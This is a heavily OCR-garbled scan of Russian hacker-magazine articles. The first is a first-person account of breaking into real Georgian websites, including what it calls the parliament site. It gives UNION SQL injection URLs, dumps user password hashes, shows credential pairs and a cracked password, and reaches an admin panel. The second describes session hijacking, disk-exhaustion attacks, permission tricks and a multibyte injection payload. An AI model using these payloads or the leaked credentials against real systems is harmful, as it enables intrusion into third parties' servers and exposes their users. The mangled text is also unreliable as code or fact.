09023а764ЬсІ) на одном иззабугорных дедиков (с целью в дальнейшем 
потыкать пароль на фтп/ссш/еіс) и принялся за поиск новой жертвы. 

На этот раз моего внимания удостоился крупный грузинский портал с 
красноречивым доменом ѵѵѵѵѵѵ.іпІегпеСде . Высокий РН и обилие инфор- 
мационных материалов свидетельствовали о широкой популярности 
портала. Реверс ІР показал, что на сервере, помимо ѵѵѵѵѵѵ.іЩегпебде . 
хостилось еще с десяток грузинских ресурсов: 

азбгоіоду . іпбегпеб .де [212.72.130.138] 

бзі.де [212.72.130.138] 

сізі . опііпе . де [212.72.130.138] 

тадізбгаіі . де [212.72.130.138] 

таплпѵ. айзі .де [212.72.130.138] 

ѵ\плпл7- . саисазиз . пеб [212.72.130.138] 

шт. саисазизопііпе .де [212.72.13 0.138] 

шт.де [212.72.130.138] 

шт . деогдіа . пеб .де [212.72.130.138] 

шт . іпбегпеб . де [212.72.130.138] 

шт. опііпе . де [212.72.130.138] 

шт. запеб.де [212.72.130.138] 

Какоказалось, с примечательного ѵѵѵѵѵѵ.де был настроен редирект на 
ѵѵѵѵѵѵ.іпіюгпеСде :]. Однако на основном поддоменеуязвимостей обна- 
ружить не удалось. Тогда, перерыв Гугл, я составил список поддоменов 
портала: 

агсЬіѵеіпеілз . іпбегпеб . де 
азбгоіоду . іпбегпеб . де 
іпемз . іпбегпеб . де 
кісіз . іпбегпеб . де 
раззрогб . іпбегпеб . де 
роіібісз . іпбегпеб . де 
зрогб . іпбегпеб . де 
Сор . іпбегпеб . де 
бѵ . іпбегпеб . де 
ѵаіиба . іпбегпеб . де 



Просмотрев поверхностно каждый из поддоменов, я обнаружил неявную 
зці-инъекцию на іпеѵѵз.іпіегпебде : 

Ьббр : / /іпетлз . іпбегпеб . де/збаб_ге1абіѵез . 

Ъ.бт1?с1абе=2 008-0 8-09&збаб=-1+ипіоп+зе1есб+1 , 2,3,4, баб 
1е_пате ,6,7,8,9,10,11,12, 13 + бгот+іпбогтабіоп_зс]гета . 
баЫез + 1ітіб+25 ,1/* 

Сам и нъект прекрасно функционировал, но обилие табличек, в том числе 
и с малопонятными названиями, отбивало всякое желание работать. 
Крометого, на доступ ко многим таблицам у пользователя ѵѵебизегй 
Іоса ІГіозІ (от имени которого я выполнял запросы) попросту не хватало 
прав. О наличии б1е_ргіѵ говорить тоже не приходилось. Не радовала и 
обнаруженная админка ресурса: 

Ъббр : / /шт . іпбегпеб . де/абтіп/ 

Доступ к ней определялся, судя по всему, хтассесом. 

Сохранив багу в закладках браузера до лучших (читай — худших) времен, 
я решил попытать удачу на поприще грузинских госресурсов. Задача 
предстояла нелегкая, но после «боевой» разминки азарта только приба- 
вилось. 

В КОНТРОЛЬНЫЙ УДАР 

Посетив несколько грузинских государственных ресурсов, я остановил 
свой выбор на сайте парламента Грузии — ѵѵѵѵѵѵ.рагІіаппепГде . Проска- 
нировал структуру ресурса и получил следующую картину: 

• Еііез (каталог) — содержал в себе множество различных 
рбб -документов : 

100_18166_77 67 83_с1етапс1з . рбб 
1048_16533_150665_з апбасѵа . рсИ 
1048_16533_216628_АБСНАКА.рб1 
1048_16533_2432 51_ас1атіапізуб1еЪаба . рсИ 
1048_16533_7 889 83_аха1да2гс1аіигізбТаазосіасіа . рбб 
1049_16559_119653_08_Раде_01 . рбб 
1049_16559_263487_гедіоп_аргі1 . рбб 
. . . ебс 

• петозіеббег (каталог) — содержимое: 

2006 
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ІамзІБ 

Іамзіб 

• радев (каталог) — содержимое: 
рТюС о з_с1ер_0 8_1 2 

• агсЬ.іѵе_еп (каталог) — содержимое: 

раг192 

раг199 

Движокресурса был написан на РНР, посему, недолго думая, я приступил 
к анализу скриптов. Благо, на этот раз мне повезло: уязвимость нахо- 
дилась в скрипте іпсіех. рбр в нефильтруемом параметре «зес_ісІ». Сам 
запрос выглядел так: 

ТШСр : / /шт . рагі іашепР . де / іпсіех . ріір? 1апд_іс1=ЕЫС&зес_ 
ісі=1185&іп:І:о_і(1=-1 + зд1-запрос 

Крометого, бага раскрывала путь к корню ресурса: 

/изг/іосаі/шлѵ/рагііатепр/ 

Как и в предыдущих случаях, доступа кб1е_ргіѵ не было, а значит, на 
использование ІоасНіІеО можно было не рассчитывать. Не было доступа 
и к тузцбизег. Тогда я просмотрел инфу о базе и пользователе: 

изег: сІаСоѲІосаІІіозР 
ѵегзіоп: 5.0.51а-1од 

И принялся за поиск ап петитных табличек в базе. Наткнувшись на 
табличку под названием «изегз», я без труда смог перебирать захэширо- 
ванные пароли пользователей, коих насчитывалосьоколо 800: 

ТШСр : / /шш . рагі іатепР . де / іпсіех . ріір? 1апд_іс1=ЕЕГС&зес_ 
ісі=1185&;іпТо_і(і=-1+ипіоп+зе1ес1: + 1 ,2, 3,4, 5, б, 7, раззтлг 
огсі, 9,10,11, 12 , 13+ЕКОМ+изегз+ІітіР+І , 1-- 

Вскоре, сконструировав запрос с помощью сапсаШ, я получил полно- 
ценный доступ к БД с юзерскими аккаунтами: 

ТШСр : / /шт . рагі іашепР . де / іпсіех . ріір? 1апд_іс1=ЕЕГС&зес_ 
іс!=1185&іпіо_і(1=-1+ипіоп+зе1ес1: + 1 ,2,3,4, сопсаі (изегпа 
те,сЬаг(58) ,раззѵ\гогс1) , 6 , 7 , 8 , 9 , 10 , 11 , 12 , 13+ігот+изегз+ 
ІітіР+10 , 1-- 

Таким образом, я слил пару десятков аккаунтов вида: 

ѵіѵадеосіеа : 55е9а83с18533е24с1Т2аЗс1444ае(1Ь48е8 
екаРегіпе : (1Ь5іЬбіа24718б372беб8549 0Ь97еЫ8 
паіізи : с713е1ісЬ5аіі9589і7а324і7Т921274 
ігіпа : ббіЬас9Ь0бЬес!сеіа0(1Ь4і218 01е0с8е 

Сбрутив выборочно первый из паролей, я стал счастливым обладателем 
полноценного аккаунта ксистеме: 



логин: ѵіѵадеосіеа 
пароль: еаппіа 
хэш: 55е9а83с18533е24с1Т2аЗс1444аес1Ь48е8 

Нащупать админку не составило особого труда. Она находилась по стан- 
дартному расположению в каталоге/абппіп: 

ІіРРр : //ѵлллѵ.рагІіатепЦ . де/ас!тіп 

Но при переходе по линку меня ждало разочарование в виде недвус- 
мысленной надписи «РогЬісІсІеп». По всей видимости, доступ кадмин- 
ке был закрыт либо фильтровался по неизвестному мне диапазону 
ІР-адресов. 

Мириться ста ким положением вещей абсолютно не хотелось, посему 
я принялся парсить поддомены ресурса. Кмоемуудивлению, единс- 
твенный поддомен ШрУ/изегз.рагЦатепЕде работал на том же движке, 
что и ѵѵѵѵѵѵ.рагІіатепЕде . Следовательно, успешно функционировал и 
найденный ранее баг: 

ІіРРр : //изегз .рагііашепр . де/ іпсіех . рЬр?1апд_іс1=ЕШ&зес_ 
іс!=1185&іпіо_іс1=-1+ипіоп+зе1ес1і + 1 ,2,3,4, сопсаі (изегпа 
ше,с!іаг(58) ,раззѵ\гогс1) , б , 7 , 8 , 9 , 10 , 11 , 12 , 13 + ігот+изегз + 
ІітіР+10 , 1-- 

А больше всего меня обрадовала рабочая админка по адресу: 

ІіРРр : / /изегз . рагІіашепС . де/абтіп/ 

Что было дальше, думаю, описывать не имеетсмысла. Пусть это оста- 
нется моим маленьким секретом. Дефейсить или нет — личное дело 
каждого, моеже отношение кдефам — отрицательное. Меня больше 
интересовала судьба бажного движка, которую я решил прояснить при 
помощи Гугла. Вбил в поисковикзапрос вида: 

іпигі : .де + іпигі : «/іпсіех . ріір? 1апд_іс1=Е]ХЮ» 

И перешел по линку: 

ІіДЦр : / / ѵ\Алм . доодіе . ги/зеагс1т?сотр1еЦе=1&]т1=еп&пеѵ\міп(!отлг 
= 1&д=іпиг1%ЗА. де+%2В+іпиг1%ЗА%22%2Еіпс!ех . р1ір%ЗЕІапд_іс1 
% 3 БЕШ% 2 2 &ЪРпС=Зеагс1і&ад= 1: &од= 

Перед моим взором открылось несколько десятков ресурсов суязвимым 
скриптом... Впрочем, как говорится, это уже совсем другая история. 

Н РАЗБОР НАЛЕТОВ 

Можно долго спорить на тему «бытьдефейсу или не быть», можно ввя- 
зываться в политические баталии. Сути это не изменит. Сеть изначально 
была пространством свободы, свободы выражения мыслей и свободы 
действий. Именно поэтому взлом — это искусство, а не способ решения 
политических проблем. Так или иначе — выбирать тебе. Я искренне 
надеюсь, что ты сделаешь правильный выбор. Удачи тебе, и до новых 
встреч на страницах журнала, ш 
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Журнал 
пля насі 



ЩИН ИЗ КРУПНЕЙШИХ в РОССИИ ЖУРНАЛОВ, ГДЕ ПУБЛИКУЕТСЯ ОПЕРАТИВНАЯ, 
ПОДОБНАЯ И ЭКСКЛЮЗИВНАЯ ИНФОРМАЦИЯ 0 ЛУЧШИХ КОМПЬЮТЕРНЫХ ИГРАХ, 
ПОСТЕРА, НАКЛЕПКИ, УНИКАЛЬНЫХ ОТО, СТРАН И Ш 







невыполнима 



БРУТАЛЬНЫЕ АТАКИ НА ѴѴЕВ-СКРИПТЫ 



Некоторые люди считают, что уже все, что можно, — придумали или откры- 
ли. Все баги ѴѴЕВ избиты, скучны и однообразны. Не стоит поддаваться этой 
иллюзии! Нестандартное мышление — вот, что отличает лучших хакеров 
и дает им рог изобилия решений. Если все методы испробованы и вариантов 
более нет, если надежда угасла и ты в тупике — не отчаивайся. Этой статьей 
я докажу, что невозможное возможно. 



Н НЕМНОГО УЛИЧНОЙ МАГИИ ИЛИ КРИВОЙ снмоо 

Публикацию статьи отехнологии атаки через геѵегзе-ір (Іооки р-і р) за 
авторством N50 можно считать началом открытого противостояния 
администраторов хостингов — и тех, кто желаетзалезть на смежный 
сайт соседа. Многие начинающие хости нги вообще не занимаются 



разделением прав доступа. Затем сисадмин (видимо, после пары тысяч 
жалоб\дефейсов] прикручивает зирітр либо зиехес, и какое-то время 
все работает. Инициатива переходит от одной противоборствующей 
стороны кдругой в ритме выхода нового пабликэксплойта под РНР и 
выхода патчей. Прошло достаточно времени, чтобы всем, наконец, стало 
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Уязвимость РНРВВ: утечка сессии в гете через 
реферер на удаленное изображение 
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Уязвимость в обработке сессий от Стефана Эссера 



ясно — РНР дыряв, какдуршлаг, и доверять ему нельзя (что, кто-то еще 
сомневается?). Не сегодня-завтра выйдетадвизори с новым мегабагом, 
и опять все будут ахать и патчиться — в который уже раз... и ужточно не в 
последний. 

Если говоритьотенденциях.то наблюдается упор на разделение прав 
через стандартную файловую систему вкупе с зиехес и іір-доступом 
разделения прав. Это, можно сказать, бронебойный прием, поскольку 
попасть в директорию, тебе не принадлежащую, может разве что гооС Для 
надежности дополнительно чмодят все системные директории на -гѵтх-- 
х--х. Действительно, комуеще (и, главное, зачем) может потребоваться 
листинг корневой директории, /еДс, /ѵаг, /изг помимо гооСа? 
Полезные бинарники вроде ій, сжсі, ипаше, ііпй тоже порой имеют 

права гооі;м1іее1 -г-хг-х , та к что и команды не выполнишь! 

Ноу чмода есть одна маленькая тонкость. Наличие байта выполнения 
--х на директории позволяет пройти в нее! Прочитать ее мы не сможем, 
но, к примеру, вложенные директории и файлы могут иметьуже более 
демократичные права доступа. Ниже приведу пример. 

ій 

иій=80 (ѵ\плплй дій=80 (члплплй дгоирз=80 {тяъг) 

1з -ІіаК /Тюте 

— гмх--х--х гооТ : гооТ /Тюте/ 

— гѵ\гх--х--х изег:изег /Тюте/изег/ 

— шхг-хг-х изег:изег /Ьоте/изег/Ызйосз/ 

— гшсгшсгшс изег:изег /Тюте/изег/ТШсІосз/Ттр/ 

Смотри: обратившись по абсолютному пути /Ьоше/изег/ЬСйосз/ 
Ттр/, мы окажемся в папке, доступной на запись и видимой из ѴѴѴѴѴѴ. 
Если отсутствует листинг папок, ничего не мешаеттупо, брутфорсом, 
подобрать вероятное имя по словарю (мою реализацию скрипта ищи на 
диске). Перебор возможных путей через скрипт брутфорса [а -т] на путь 
длиной в пятьсимволовзайметне более минуты на . рЬ р и еще меньше 
— через зб-скрипт. 

Даже в случае нечитабельных папок не составляеттруда прочесть 
.ЬСассезз/іпйех.рІір и уже из них вытягивать логины/пароли/инклу- 
ды на конфиги и т.п. 

Определив существование директории/файла, мы, скорее всего, полу- 
чим доступ на чтение и возможный бонус «листать/писать» во вложен- 
ные директории и файлы. Ну, а где же достать самый полный путь? 



Для этого идеально подходят конфиги апача іШСрй. сопі, ѵЪюзТз. 
сопі, — но они практически всегда защищены от любопытных глаз уже 
правильным чмодом. 

Ксчастью, /еДс/раззмй готов рассказать нам о домашнем каталоге 
юзеров. Ауж наличие соответствующих папок можно определить, исходя 
из аналогии имеющегося домашнего каталога (либо незатейливым 
брутфорсом). 

Даже если включен заіе_шойе или ореп_Ьазейіг, мешающий полу- 
чить раззмй, и никто не делится стобой приватными эксплоитами для 
обхода этого фашистского изобретения, — все равно можно вывернуться 
через фичу в розіх_деТртіі<Э ( ) (подробнее на раскеізіогтзесигііѵ. 
огд/0712-ехрІоі1:5/рбр525-Ьѵра55.І:хі ). 

Защита проста, какдва байта, — достаточно всего одной директории 

в пути быть чмоднутой на -гтох--х или даже -гмх , и все 

хакеры пойдут лесом. Хотя, вспоминаяпрошлыйномерПс описанием 
багов файловых систем от Криса Касперски, я начинаю задумываться: а 
что, если... :). Впрочем, наша история совсем не о том!.. 

Кстати, уже после написания подтемы сбтосі, вынашиваемой и прове- 
ряемой мною втечение многих месяцев, я, руководствуясь исключи- 
тельно лишьсвоим насыщенным опытом, решил в давнозаведенном 
порядке посерфитьсекурити-блоги в надежде разжиться мало-мальски 
свежей инфой и новыми идеями. 

Как выяснилось, ни одного меня затронула вышеописанная бага. И это 
нормально, история знаетнемало примеров, когда одинаковые идеи 
посещают двух людей одновременно — вспомним законы в физике, ма- 
тематике и других науках, названные двойными фамилиями соавторов, 
порой живших в разных точках земного шара и понятия не имевших друг 
о друге. 

Н КОММУНАЛЬНЫЙ /ТМР 

Казалось бы, что такого примечательного в общей временной папке? 
Самое главное, это то, что она — общая! Как правило, каждому вирту- 
алхосту прописывают индивидуальные настройки вроде сэйфмода, 
опенбаздира. Но временную папку ставят одну на всех вместо создания 
индивидуальной в домашней директории клиента. Так, в рЬр.іпі это 
параметр зеззіоп . заѵе_раТЬ. По факту, «темп» — это мусорка. Про- 
ходит месяц-другой, и в одно недоброе утро администратору приходит 
пара десятковжалоб на многочисленные ошибки с варнигами. «Темп» 
оказывается переполненным, ведь созданные сессии удаляются только 
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при вызове зеззіоп_безбгоу ( ) , о которой часто забывают, не жмут 
на Ехіі или просто не догружают страницу. 

Админ, недолго думая, в сгоп.топбЪ. ставит новую задачу, призванную 
периодически чистить /Стр. Разумеется, написатьзб-скрипточистки 
одной статичной папки проще, чем N юзверских папок(хотя можно 
возложить почетную задачу уборки на юзера, особенно если квоты дис- 
кового пространства уже прикручены]. 

В общем, такили иначе, но индивидуальный зеззіоп. заѵе_рабЪ. 
необходим для секурности. Как, впрочем, и... ир 1 оаб_бтр_біг! Ведь 
сбои при загрузке файлов происходят довольно часто, ибо аплоад файла 

— это, прежде всего, РОЗТ-пакет нехилых размеров. По моему опыту, 
далеко не каждый провайдер корректно его переваривает, особенно в 
часы пик. Да и РНР не всегда удаляет недогруженные куски, подвисая 
балластом в ожидании конечной части. Это дает вероятный бонус найти 
втемпе что-либо интересное, например, кусок недогруженного конфига 
илидампа БД, логи, а иногда — следы творческих экспериментов адми- 
нистрации в программировании с наличием чувствительных данных. 
Более того, любой рбр-скриптпри «бі 1 е_ир 1 оабз= 0 Ы» автоматически 
принимает файл в РОЗТ-пакете. Это позволяетзагрузить на целевой 
сервер большое количество файлов. Например, в РНР 5.1 .х количество 
файлов, которые можно загрузить зараз, не ограничено! А в свежем РНР 

— «не более [розб_тах_зІ2е] ». Все это повлечет за собой исчерпа- 
ние свободного дискового пространства в папке временных файлов. 
Примерная схема атаки выглядиттак: 

1. Атакующий посылает к любому рбр-скрипту на сервере специально 
сформированный Р05Т-запрос («тиібірагб/богт-сіаба»), содер- 
жащий файл (или файлы). Размер одного отсылаемого файла должен 
бытьне больше максимальноустановленногозначения директивы РНР 
[ир1оас1_тах_бі1езІ2е] (Эе1 : аи11:=32Мб] — и не более [розб_тах_ 
зіге] (Оеба и и=1 6 Мб) по минимальному значению любого из пара- 
метров. Размер пакета (Шр-хидер) «Сопбепб-Ьепдбк» указывается 
заведомо больше истинного (как минимум, на 5 байт). 

2. Сервер принимает РОЗТ-пакетс файлом. В незаконченной передаче 
мы держим коннект и заставляем сервер слушать соединение сколь воз- 
можно долго. Все это время загруженный файл будетзанимать место на 
диске сервера, реализуя атаку на исчерпание дискового пространства. 
Варианты защиты от атаки: 

Запретить [ бі1е_ир1оасіз] 

Ограничить время установленного соединения «клиент 
— сервер» в настройках файрвола или веб-демоне (арасйе) 



— кббр : / / зу зоеѵ . ги/меЪ/ирІоасІ . Ьбті . 

Что интересно, мне встречались системы, где загружаемые временные 
файлы имеют не псевдослучайное имя, а именуются строго последова- 
тельно. Отверсии РНРэто независит. Аотчего зависит? Пока мнеэто 
неизвестно. Проверить конкретный сервер на предмет предсказуемых 
имен временных файлов легко — достаточно найти вывод рітріпбо ( ) . 
Посылаем пакетсфайлом и смотрим в ответезначение [бтр_пате] . 
Посылаем еще раз и сравниваем. 

Если имя вполне последовательно прибавило пару чисел — налицо вы- 
шеописанный баг! Используя алгоритм задержки загруженных файлов 
на сервере, можно попытаться загрузить веб-шелл. И теперь, если где- 
то на сервере имеется рітр-іпсіибе, его легко заюзать! 

Помимо описанного, на мой взгляд, самым интересным здесь является 
угон чужой сессии (зеззіоп Ні)аскіпд). Но об этом чуть ниже. 

Н КОВАРНЫЕ СЕССИИ 

Немалая часть веб-приложений юзает сессии РНР для разграниче- 
ния прав доступа между юзерами. Напомню забывчивым, что вызов 
<?рЪр ; зеззіоп_збагб ( ) ; ?> создает файл сессии с ісі из случайных 
аІрЬа-питегіс — случайных или определенных в скрипте посредством 
вызова зеззіоп_ісІ ( 1 <а1р1іа-питегіс> 1 ) — перед зеззіоп_ 
збагб ( ) . Пример: аірйа-питегіс: /бтр/зезз_50с!7ес14Ъ37б95 
б991679ббб92Ъа894е2. После чего это имя дублируется в браузер 
пользователю какзначение кукис с дефолтным именем «РНРЗЕ85ІВ» 
(можно изменить глобально из рйр.іпі или локально в скрипте, вы- 
звав зеззіоп_пате ( 1 <МУ_ЗЕЗЗІР> 1 ) перед зеззіоп_збагб ( ) ]: 

Зеб-Соокіе: РНРЗЕЗЗІВ=50б7еб4Ъ37б9 5б99167 9б(Іса92Ъа894е2 

Атака на сессии считается одним из эффективнейшихтестов на раскры- 
тие полного пути — она в десятке лидеров, таких, какпоиски обращение 
клевым скриптам, передача массива вместо строки в переменной, 

ОБоЗ на БД, переполнение мусором логфайла и т.п. Достаточно, скажем, 
передать в СЕТ или С00 КІЕ«рнрзезз:го= 123 ! @#$% А » и получим Еггог 
уровня ѴѴагпіпд, если еггог_герогбіпд (Е_ШШШЫ0) разрешено. 

Шагпіпд: зеззіоп_збагб ( ) [бипсбіоп. зеззіоп-збагб] : ТЬе 
зеззіоп ісі сопбаіпз іііедаі скагасбегз, ѵаііб скагасбегз 
аге а- 2 , А- 2, 0-9 апб ' - , 1 іп . . . 

Либо передадим «рнрзеззів» длиной более 256 символов. Файл с 
таким именем не может быть создан, и ответом сервака будет: 

Шгпіпд: Шкпоѵт: Раііеб бо тлпгібе зеззіоп баба (бііез) . 
Ріеазе ѵегібу бкаб бке сиггепб зеббіпд об зеззіоп . заѵе_ 
рабк із соггесб 

Сам факт создания файла лишь на основании РНРЗЕЗЗІО в СЕТ или 
СООКІЕ, с именем аналогичным ісі , наводит на мысль о... ООоЗ-атаке. 
Точнее, об эффекте ееусиления. 

Ресурсы системы, затраченные на создание файла сессии, ничтож- 
ны. Сам файл сессии зачастую и вовсе пуст (зависит оттого, были ли 
внесены значения в $_ЗЕЗЗІ(Ж в процессе выполнения скрипта]. Но 
генерируя мусорный трафике рэндомным РНРЗЕЗЗІО, можно создать 
количество файлов сессий, равное числу ЫТр-пакетов при БОоЗ — то 
есть, очень много. МЕТ никто не отменял! Совсем недавно Крис писал, 
что даже совершенно пустой файл занимает 1 кластер. 

Да что там раскрытие пути! КРНР написаны болеедесяти эксплоитов с 
атакой ВоЕ на функции сессий. Это уже кое о чем да говорит. И те, кто с 
презреньем утверждают, что ВоЕдля РНР — полная лажа, лишь оправ- 
дываютсвое незнание. 

Между прочим, порой это единственный шанс выбраться из клетки 
опен_баздира с сэйф-модом, когда ехес-эксплоиты кончились, а выпол- 
нения системной команды таки нет. 
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рбріпіоП показываетвременное имя загружаемого файла 




В одном скриншоте — работа ддосера рбр и отсутствие рандомизации 
ітр_пате! 



Нуатеперь подробно рассмотрим перехват сессий. Примечательной 
особенностью пользовательской сессии является уникальность ее ісі, 
знание которого, как ни странно, будет достаточным для успешного 
прохождения авторизации юз веря. Хранятся сессии либо в базе данных 
приложения (и это правильно, ибо максимально безопасно], либо в 
созданных средствами РНР файлах в папке /Стр. 

Ну а поскольку /Сшр, как мы уже выяснили, часто доступен всем же- 
лающим на чтение/запись, то нетрудно догадаться о выводах. Здесь, в 
зависимости отусловий, возможны различные варианты атаки. 
Фактически, можно обойтись листингом темпа, ведь, как правило, 
достаточно знать іб сессии. Подменив ісі своей сессии на ісі чужой в 
кукисе, мы успешно авторизуемся под другим юзверем. Зачастую, если 
возможен лишь л истин г темпа, то сессии каждого сайта имеют иіб/диіб, 
принадлежащий конкретному сайту. Это оченьудобно.таккаквместо 
перебора всех сессий из /Стр легко отделить нужные. 

Защитой может служить хранимый в сессии ІР-адрес или Изег-АдепС 
пользователя, срокдействия и соответствующая их проверка при авто- 
ризации. 

Когда есть возможность читать файлы чужих сессий, — мы уже будем 
иметь хотя бы представление о ее структуре и содержании. Это важно, 
если используется какой-либо самописный\неизвестный движок, струк- 
тура сессий которого неизвестна заранее. Или — если стоит секурити- 
проверка на ір, Ьгоѵѵзег, срокдействия. 

Пусть тогда мы не сможем использовать существующие сессии, но, 
исходя из примеров читабельных сессий, становится возможным сгене- 
рировать свою собственную! Закинуть ее в темп, чмоднуть на 0777, чтобы 
другой пользователь имел к ней доступ (правда, с заіе_шосіе=оп это 
не прокатит] — после чего использовать. Защитой здесь может служить 
хранение данных в зашифрованном виде: либо обратимым алгоритмом 
(АЕЗ.ЫибзбДѵѵиЕзЫ с ключом, хранящимся в конфиге или БД, либо 
необратимым алгоритмом (тбб.збаі ] с рэндом ной солью, хранящейся 
опятьже в конфиге, БД или другом недосягаемом месте. Даже если хаке- 
ру будет известен механизм генерации хеша — он не сможетсгенериро- 
вать собственную подложную сессию! 

Самый редкий, но благоприятный вариант: если Апач работает на 
правах тлплм-сіаЦа/поЬосіу для всех. Это значит, что все файлы (втом 
числе, сессионные) создаются с одинаковыми правами и доступны 
любому желающему не только на чтение, но и на запись. 

Права на запись хороши тем, что становится возможным обойти простую 
(незашифрованную] привязку к пользователю, изменив параметры в 



существующей сессии под себя. Алгоритмы защиты аналогичны преды- 
дущему пункту. 

Заметно прибавит проблем взломщику вызов зеззіоп_гедепегаке_ 
ісі ( ) , меняющий зеззіоп_іс! ( ) . 

Говоря о сессиях, следуетупомянуть еще об одном баге РНР отБіе^ап 

Еззе г ѵѵѵѵѵѵ.рбр-5есигіІѵ.огд/МОРВ/РМОРВ-46-2007.Ыпп[ — « ЕХТ / 
Зеззіоп НТТР Кезропзе Неасіег ІпдесСіоп ѴиІпегаЬіІіСу 
РНР4<=4 .4.7, РНР5<=5 .2.3». 

Таки быть, я сэкономлю несколько часовтвоего времени (ибо время для 
хакеров бесценно]. 

Попробовав обратиться ксайтутак: «/зеззіоп. ркр?РНР8Е38ів=123» 

— мы просто заюзаем сессию зезз_123, если она есть, или создадим 
ее, если таковой нет. Но та к будет толь ко в случае, когда в браузере еще 
неткуки «рнрзеззіо» (поскольку она имеет более высокий приоритет 
в сравнении с О ЕТ). Дело обстоит совсем по-другому при обращении к 
линку вида «/зеззіоп. р!ір/РНРЗЕЗЗІЕ=12345б; ІШЕСТЕБ=АТТКІ 
ВОТЕ; /». Браузеру в ответ отправится пакетсхидером «ЗеС-соокіе : 
РНРЗЕЗЗ 10=123 45 6; ІШЕСТЕВ=АТТКІВОТЕ ; ; ракк= / ». Для успеш- 
ной эксплуатации уязвимости необходим еггог_герогкіпд ( 0 ) . 

К сожалению, внедрить какой-либо символ в игіепсосіе вроде 
%СШ , %0А нельзя — игіепсосіе просто не обрабатывается. То есть, ни 
«ЬосаСіоп», ни дополнительный «ЗеС-соокіе» добавить не выйдет: 
только ехрігеб, ботаіп и раіЬ для текущей куки. Если заблаговременно 
создатьсвой файл сессии, чмоднутьего на 0777 и заманить админа по 
линку (фактически, вынудить его браузер юзать сессию с нашим ісі] 

— тогда мы получим его файл сессии с правами на запись. 

Здесьже хочу напомнить про актуальность перехвата сессии через 
ВЕЕЕРЕР. С одной стороны, звучит неправдоподобно, но — это только 
так кажется. Атака становится возможной, если приложение добавляет 
сессию пользователя в (ЗЕТ-запросе. Причем, это может быть отнюдь не 
глюком, а документированной поддержкой. 

Зачем это нужно? Подобный механизм авторизации через ОЕТ акти- 
вируется в двигах в случаях отключенных куков в браузере или отклю- 
ченной явы. В итоге, вместо повышения безопасности мы получаем 
бонусную течь. 

Какже это можно использовать? Тебе необходима лишь поддержка 
чатом/форумом/блогом тега <ішд> (или ЬЬ-тэга [ішд] ]. Ну, или 
поддержка удаленного аватара. Воттут и дырка: мы можем сослаться 
на изображение на своем сервере и снифать поступающие рефереры 
его просмотра через ассезз_1од или через РНР, подобно капча- 
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скриптам. В реферере помимо II В И предыдущей страницы будет 
содержаться сессия юзера. Ярким примером служат практически все 
ѴѴАР-порталы. Я не специалист по такому софту, но некоторые теле- 
фоны (РОА/КПК) не держат соокіе. Это компенсируется передачей 
сессии в ОЕТ-запросе. 

Примеруязвимого движка — всеми любимый: рЬрВВ 2.0.23 Беззіоп 
Нцаскіпд ѴиІпегаЬіІИу [ веси гіЫосиз.сот/агсЫѵе/І /48981 5 ). Утечка 
сессии происходит при закрытии темы модератором. 

Н МІЛ.ТѴ-ВѴТЕ 

Впервые об этой уязвимости в РНРзаговорили в 2006 году. Шло обсуж- 
дение недостаточной фильтрации в функции асісізіазііез ( ) , просла- 
вившейся как простая защита от 501- инъекций. Общественность, как 
всегда, очень вяло отреагировала на появлениеуязвимости — за что и 
была наказана. Многие достаточно крупные и очень крупные серверы 
подвержены этой уязвимости. Ба г присутствует как в версиях МуБОБ 
4.1.х->4.1.20 , 5.0.х->5.0.22, так и в самом РНР <= 5.2.5. 

Асісізіазііез ( ) некорректно обрабатываеттри различные кодиров- 
ки — 5Л5, ВІ65 (более известную, какСР950] и О В К(С Р936) . Все они 
основаны на двоичной системе. Кодировки являются расширенными 
и используются преимущественно в азиатских странах, где требования 
языка не удовлетворяют стандартному 256-символьному ограниче- 
нию. Таким образом, вероятная уязвимость азиатского сайта катаке на 
мульти байт несоизмеримо выше по сравнению со всеми остальными 
ресурсами. 

Первый адвизори вышел для ОВК, поэтому подробно рассмотрим осо- 
бенность именно этой кодировки. 

В ОВКсимволы интерпретируются по одному. 0хЬП27 состоит из двух 
символов в 2-ной системе — именно этотсимвол будет некорректно 
отфильтрован. Также некорректно отфильтруется 0хМ5с. Это вызовет 
ошибку, так как будет недопустимый символ (\). Рассмотрим теперь эти 
данные, обработанные функцией асісізіазііез ( ) . 

Первый вариант, 0хМ27, будет интерпретирован, как одиночные 
символы. ОхМ при переводе будет ( ? ) , а затем — 0x27 ( 1 ) . И второй 
вариант— 0хМ5с. ОхМ при переводе будет (?) , а затем 0x5с (\). 
АсІсІзІазЬез возвращаетсроку зСг, в которой перед каждым спецсим- 
волом добавлен обратный слэш ( \ ) , например, для последующего 
использования этой строки в запросе к базе данных. Экранируются 
одиночная кавычка ( 1 ), двойная кавычка ("), обратный слэш (\) и 
І\ІІЛ_ (байт І\ІІЛ_І_). Этотфильтр может пропустить некорректные символы 
к базе данных, а именно ( 1 ) . После чего станет возможно составление 
запроса к базе данных. При следующем синтаксисе БД: 

СКЕАТЕ ТАВЬЕ СаЫез ( 

ісі ѴАКСНАК. ( 32 ) СНАКАСТЕК ЗЕТ СВК , 

сІаСа ѴАКСНАК ( 8 0 0 0 ) СНАКАСТЕК ЗЕТ СВК, 

РКІМАКУ КЕУ (сіаСа) 

) ; 



— можно составитьзапрос: 

тузд1_диегу ( " ЗЕЬЕСТ сіаСа ЕКОМ ІаЫез ШЕКЕ ісі= 1 " . 
асісізіазііез ( $ ісі) 

Чтобы составить корректный запрос, тут обязательно надо закрыть па- 
раметр «ісі= 1 » и привести его к виду «ісі= 1 1 1 ». Но передать одинарную 
кавычкумы несможем.таккаконаэкранируется. Если версия нашей 
базы данных совпадаете одной из указанных выше, мы можем эксплуа- 
тировать уязвимость, передав следующий пакет: 

/?іс!=%ВЕ%27 ' ипіоп зеІесС 1,2/*'; 
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ьтернативное получение /еСс/раззѵ/сі через розіх() 



Метод будет работать только при шадіс_диоСез_дрс = ОРГ (так как 
при включенном шадіс_диоСез_дрс поумолчанию все 0ЕТ/Р05Т/ 
СООКІЕ будут обрабатываться функцией асісізіазііез ( ) — что приве- 
дет к двойной фильтрации]. 

Примером пабликэксплоитов могут служить 50 Б- іщ в ѴѴогсіргезз <= 2.3.2 
с БД в ОВК-кодировке ( зесигіІѵѵиІпз.ги/БбоситепІбЗб.ЫтІ ]. 

Особого внимания заслуживает пабл и к эксплоит под 5МЕ<=1 .1 .4 
( ті[уѵ0гт.сопп/ехр[оі1:з/5826 ). Эксплоит, основанный на принудительной 
смене л окал и базы данных на уязвимую В 165, уже не зависит от л окал и 
кодировки сервера. Не исключено существование аналогичных багов и 
в других приложениях. 

Эти виды кодировок мало распространены, поэтому самая простая 
